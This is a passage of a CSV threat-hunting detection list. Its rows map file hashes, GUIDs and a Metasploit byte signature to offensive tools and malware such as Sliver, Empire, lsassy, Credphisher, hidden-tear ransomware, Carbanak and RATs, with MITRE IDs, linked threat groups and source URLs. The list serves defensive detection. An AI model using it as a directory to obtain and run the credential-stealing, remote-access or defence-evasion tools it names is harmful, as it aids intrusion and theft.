TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","25403" "*4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250*",".{0,1000}4161e74ca12ad3a932dba34cf3f9eb2759b66f3a00cfda052381be4304454250.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25404" "*416291332a70407df5ff5d79072f5ad68cd802b9*",".{0,1000}416291332a70407df5ff5d79072f5ad68cd802b9.{0,1000}","offensive_tool_keyword","PowerLess","PowerShell-based modular backdoor that has been used by Magic Hound group","T1560 - T1217 - T1059.001 - T1005 - T1074.001 - T1140 - T1573 - T1105 - T1056.001","TA0011 - TA0009 - TA0010 - TA0005 - TA0002 - TA0006","N/A","Magic Hound","Malware","https://gist.github.com/farzinenddo/bb1f1ecb56aa9326abc7b47fc99e588e","1","0","#filehash","N/A","10","4","N/A","N/A","N/A","N/A","25405" "*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","#GUIDproject","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","25406" 
"*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#GUIDproject","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","25407" "*4164003E-BA47-4A95-8586-D5AAC399C050*",".{0,1000}4164003E\-BA47\-4A95\-8586\-D5AAC399C050.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#GUIDproject","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","25408" "*416656DC-D499-498B-8ACF-6502A13EFC9E*",".{0,1000}416656DC\-D499\-498B\-8ACF\-6502A13EFC9E.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","25409" "*416e6c88a59d32162f3e1d0dfa0b9032b486063509ba4a4ed68f22fa868fb1a4*",".{0,1000}416e6c88a59d32162f3e1d0dfa0b9032b486063509ba4a4ed68f22fa868fb1a4.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black 
Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","25410" "*41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c*",".{0,1000}41710a6994b2ced4ba4d7931ba0312045ef5532d38ea0072c614f23a0983cc5c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25411" "*41792ea386bced0624ba2066ed3616167eebb93212f6751e60382c0ba10a9e59*",".{0,1000}41792ea386bced0624ba2066ed3616167eebb93212f6751e60382c0ba10a9e59.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","25412" "*41794cd59707f4a17fe5736b0960fdd447d5ac35b75d70beb35c71e199b29111*",".{0,1000}41794cd59707f4a17fe5736b0960fdd447d5ac35b75d70beb35c71e199b29111.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25413" "*417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3*",".{0,1000}417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","25414" "*417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3*",".{0,1000}417a79ca577c7a337999b7e23372257421360569bf5708d0adc0f356161f35c3.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential 
Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","0","#filehash","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","25415" "*417f4c1ad7f0f15d3c01d4930cc583330eb93cf71593c8d872b65a2a50cbb6fc*",".{0,1000}417f4c1ad7f0f15d3c01d4930cc583330eb93cf71593c8d872b65a2a50cbb6fc.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","25416" "*417f92b83d18cb5d231496fde3d743a34d2f483c26cf831742e30cc11c3963bb*",".{0,1000}417f92b83d18cb5d231496fde3d743a34d2f483c26cf831742e30cc11c3963bb.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25417" "*41814257b654a82bc62e877b05af7bf4098a06db44dfd20c246e577fbf88adeb*",".{0,1000}41814257b654a82bc62e877b05af7bf4098a06db44dfd20c246e577fbf88adeb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","25418" "*4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92*",".{0,1000}4181564bd544b3bbb2c49b3b6d800feac2e4438974b650c53ad4882b76d47f92.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open 
source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25419" "*4182eca7aebb0a2cddd4d7c069fec1295f3fcf3a48d1c2e7f690a7be6e8324e2*",".{0,1000}4182eca7aebb0a2cddd4d7c069fec1295f3fcf3a48d1c2e7f690a7be6e8324e2.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","25420" "*418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49*",".{0,1000}418835f7a0c331a947db1c4de194394e84c8399d3dcb94cd66182700fc105e49.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25421" "*418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b*",".{0,1000}418c8a25e997241471590accb65f6e6727cd6f62d05f11c2a3b3b9667e39383b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 
- T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25423" "*4192844c08997d6e198c0511821d0b6cdf8c87aa94cb0b2cd249c114e2c75bb6*",".{0,1000}4192844c08997d6e198c0511821d0b6cdf8c87aa94cb0b2cd249c114e2c75bb6.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","#filehash","N/A","10","7","N/A","N/A","N/A","N/A","25424" "*4193DE42-C103-45FF-A04D-0AD64616BC59*",".{0,1000}4193DE42\-C103\-45FF\-A04D\-0AD64616BC59.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#GUIDproject","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","25425" "*41955340b55ee3c2054263a008c141151db9fcc0816b08905771e26e3739f411*",".{0,1000}41955340b55ee3c2054263a008c141151db9fcc0816b08905771e26e3739f411.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25426" "*419852f196eaa5b3d51faafd60fa1fee9a6ac5392da93d99e52b8abf2a5552c1*",".{0,1000}419852f196eaa5b3d51faafd60fa1fee9a6ac5392da93d99e52b8abf2a5552c1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25427" "*4199782412e98076a67fad677ffb17dc66fcd600cd95a8040d44d1ea380c3325*",".{0,1000}4199782412e98076a67fad677ffb17dc66fcd600cd95a8040d44d1ea380c3325.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25428" "*419a61a91a4de08b2644a68725a73c750535ea50e525ec1aea3dacf47f2ea1ea*",".{0,1000}419a61a91a4de08b2644a68725a73c750535ea50e525ec1aea3dacf47f2ea1ea.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","25429" 
"*419ab7aa44c1071066c94e861d508bc7c3751a2e1a495a0369304ac350d5fac7*",".{0,1000}419ab7aa44c1071066c94e861d508bc7c3751a2e1a495a0369304ac350d5fac7.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25430" "*419d762e596871ecea36882eef2d5f2fc99804c069bb8e1852636844faf0a52a*",".{0,1000}419d762e596871ecea36882eef2d5f2fc99804c069bb8e1852636844faf0a52a.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","25431" "*41a381d6e85d5d47296485417fab7a07c110c98927990415993d75c07f384e3c*",".{0,1000}41a381d6e85d5d47296485417fab7a07c110c98927990415993d75c07f384e3c.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25432" "*41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235*",".{0,1000}41a60eed20397bb424a1249da58750b837cb759792e06b66218e825c03c54235.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","25435" "*41A90A6A-F9ED-4A2F-8448-D544EC1FD753*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD753.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","25436" "*41A90A6A-F9ED-4A2F-8448-D544EC1FD753*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD753.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that 
include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","25437" "*41A90A6A-F9ED-4A2F-8448-D544EC1FD754*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD754.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","25438" "*41A90A6A-F9ED-4A2F-8448-D544EC1FD754*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD754.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","25439" "*41A90A6A-F9ED-4A2F-8448-D544EC1FD755*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD755.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","25440" 
"*41A90A6A-F9ED-4A2F-8448-D544EC1FD755*",".{0,1000}41A90A6A\-F9ED\-4A2F\-8448\-D544EC1FD755.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","25441" "*41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441*",".{0,1000}41aad6daa162539ca954357d9477850ccc5c1f3d492fafe09091c7419d35a441.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25442" "*41b565b208250619c33cbb858758cceb6f5382d4d64448eab3b22300257adf4f*",".{0,1000}41b565b208250619c33cbb858758cceb6f5382d4d64448eab3b22300257adf4f.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","25444" "*41cdbf8d917fa767fb086bb138e1e0cabd305ccfd22db6759fcda4d769a30a93*",".{0,1000}41cdbf8d917fa767fb086bb138e1e0cabd305ccfd22db6759fcda4d769a30a93.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - 
T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","25448" "*41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387*",".{0,1000}41d36c482530d7d3a3876cb5d8f5e3a7ba35d154dfc0ea4f73f9f8793f92c387.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25451" "*41d38b945928ee53bd8b1f3b230ecf3101f6c2249d1ec4d3d920a163045373b8*",".{0,1000}41d38b945928ee53bd8b1f3b230ecf3101f6c2249d1ec4d3d920a163045373b8.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","25452" 
"*41dc2afeaea216cd8e1f2fdd3974b2bc80fe0df8e909f9ab7bfea34979bd6a0d*",".{0,1000}41dc2afeaea216cd8e1f2fdd3974b2bc80fe0df8e909f9ab7bfea34979bd6a0d.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","25454" "*41ee1cd6256819570f05de5815f4cfe6dab88e30cf25ccd5f52bcb948e16e70c*",".{0,1000}41ee1cd6256819570f05de5815f4cfe6dab88e30cf25ccd5f52bcb948e16e70c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25457" "*41efb031f13c00affa750865d6d2bf965ccf2ded9a50c40a5ba628b97ee0cb12*",".{0,1000}41efb031f13c00affa750865d6d2bf965ccf2ded9a50c40a5ba628b97ee0cb12.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","25458" "*41f73755bc80ff028571e3496dd851447cc69f428045223deb717173e5c44e69*",".{0,1000}41f73755bc80ff028571e3496dd851447cc69f428045223deb717173e5c44e69.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","#filehash","N/A","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","25460" 
"*41fe9889b428813cda89d017204555e013cf5c081122cd821f6c343ccc2ffcb7*",".{0,1000}41fe9889b428813cda89d017204555e013cf5c081122cd821f6c343ccc2ffcb7.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","25461" "*42 3C 8B AC 10 88 00 00 00 44 8B 54 15 20 44 8B 5C 15 24 4C*",".{0,1000}42\s3C\s8B\sAC\s10\s88\s00\s00\s00\s44\s8B\s54\s15\s20\s44\s8B\s5C\s15\s24\s4C.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation 